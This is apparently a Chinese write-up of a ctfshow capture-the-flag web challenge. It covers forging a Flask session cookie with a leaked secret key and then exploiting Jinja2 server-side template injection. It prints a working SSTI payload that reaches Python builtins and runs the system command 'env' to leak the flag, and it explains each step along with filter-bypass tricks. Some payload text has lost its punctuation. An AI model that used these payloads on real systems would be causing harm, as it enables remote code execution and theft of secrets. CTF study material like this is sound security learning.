ctfshow—web内部赛 蓝瘦(session伪造+SSTI注入)
蓝瘦 wp进入页面一个登录框源代码提示param:ctfshow;key:ican应该是有传入的参数ctfshow还有获得一个密钥key任意输入1 1登入成功回显adminF12查看内存的cookiesessionkey——联想到flask框架的session伪造1. flask框架—session伪造Flask 是 Python 轻量级 Web 后端框架自带模板引擎Jinja2flask框架会把身份认证session[username] xxx 存入cookie通过secret_key加密解密所以只要获得secrey_key就可以读取或者修改session进行仿造攻击sessioneyJ1c2VybmFtZSI6IjEifQ.alsmiw.TqVtCA4VPOmyi0saPmQFyot0ndE用flask_session_cookie_manager3.py工具解密下载连接https://github.com/noraj/flask-session-cookie-manager2.python flask_session_cookie_manager3.py 用法加密 python flask_session_cookie_manager3.py encode -s 密钥 -t 加密内容解密 python flask_session_cookie_manager3.py decode -s 密钥 -c 解密内容session解密结果{username: 1}修改为{username: admin}再加密结果eyJ1c2VybmFtZSI6ImFkbWluIn0.alsohA.b5giImBffcOykZhPlrFj2_j3Q5A修改session伪造admin身份进入回显缺少请求参数想到源代码的param:ctfshow如果flask框架使用函数render_string()Template().render()参数直接作为模板内容解析就会存在SSTI注入传参?cttfshow{{2*3}}如果回显{{2*3}}就没有SSTI注入如果返回计算结果说明存在SSTI注入题目提示内存FLAG先查看一下当前环境变量因为linux环境变量存在内存中万能payloadctfshow{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__catch_warnings %}{{c.__init__.__globals__[__builtins__].eval(__import__(os).popen(env).read())}}{% endif %}{% endfor %}执行系统命令env查看环境变量拿到flagflagctfshow{5a81a1ce-72a1-4e72-9160-c4d179cb03c8}3. SSTI注入SSTI注入(Server-Side Template Injection) 服务端模板注入当用户可控输入直接拼接进模板代码时输入会被引擎解析执行攻击者可以读取文件、执行系统命令、窃取配置密钥后端服务器执行的代码通常是python/php魔数方法构造payload是常见的攻击手法{% xxx %}是Jinja2流程控制标签专门写循环、if 判断不会直接输出内容控制标签必须成对存在不然会报错{{}}Jinja2输出表达式标签包裹的内容会计算并打印到页面例如arr [] # 创建一个实例在python中任何实例都是对象字符串字符数字等都是print(arr.__class__) # 当前数组所属的类listprint(arr.__class__.__base__) #数组类list的父类objectprint(arr.__class__.__base__.__subclasses__()) #当前进程所以加载过的父类object下子类一大推类又如{% for c in [].__class__.__base__.__subclasses__() %}循环遍历当前进程所有加载过的子类{{c.__name__}} : {{loop.index0}} 把所有子类和下标一起打印输出下标从0开始{% endfor %} 结束标识符{% %}必须成对存在__class__ 实例的所属类__base__ / __bases__ 类的父类__subclasses__() 父类的所有子类__init__ 类初始化函数__globals__ 函数全局变量字典核心拿内置函数、模块__builtins__ Python 内置函数集合 (eval/exec/open)__getattr__ 动态获取属性绕过下划线过滤__getitem__ 动态取字典 / 列表值绕过 [] 过滤本题获取flag的payloadctfshow{% for c in [].__class__.__base__.__subclasses__() %} # 遍历当前进程加载过的父类的所有子类{% if c.__name__catch_warnings %} # if查参判断当前的类名是否为catch_warnings这个类python全环境通用内置__builtins__功能更全面{{c.__init__.__globals__[__builtins__].eval(__import__(os).popen(env).read())}}# c.__init__.__globals__ 查询类全局的初始化构造函数返回一个字典[__builtins__].eval从全局字典取出Python 所有内置函数集合调用函数函数eval执行字符串里的python代码__import__(os)导入操作系统模块 .popen(env).read()popen执行系统命令env查询当前环境变量通过.read()输出{% endif %} # if流程控制结束标识符{% endfor %}# for流程控制结束标识符